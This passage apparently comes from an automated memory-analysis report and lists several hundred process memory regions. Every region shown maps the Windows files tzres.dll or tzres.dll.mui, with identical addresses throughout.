entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3568
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3569
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3570
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3571
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3572
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3573
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3574
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3575
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3576
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3577
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3578
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3579
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3580
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3581
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3582
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3583
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3584
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3585
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3586
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3587
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3588
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3589
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3590
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3591
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3592
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3593
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3594
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3595
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3596
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3597
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3598
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3599
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3600
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3601
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3602
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3603
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3604
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3605
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3606
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3607
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3608
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3609
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3610
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3611
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3612
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3613
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3614
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3615
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3616
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3617
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3618
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3619
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3620
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3621
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3622
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3623
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3624
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3625
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3626
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3627
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3628
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3629
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3630
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3631
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3632
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3633
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3634
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3635
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3636
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3637
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3638
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3639
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3640
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3641
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3642
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3643
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3644
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3645
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3646
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3647
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3648
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3649
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3650
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3651
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3652
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3653
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3654
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3655
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3656
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3657
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3658
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3659
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3660
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3661
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3662
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3663
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3664
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3665
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3666
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3667
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3668
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3669
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3670
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3671
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3672
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3673
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3674
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3675
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3676
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3677
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3678
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3679
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3680
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3681
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3682
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3683
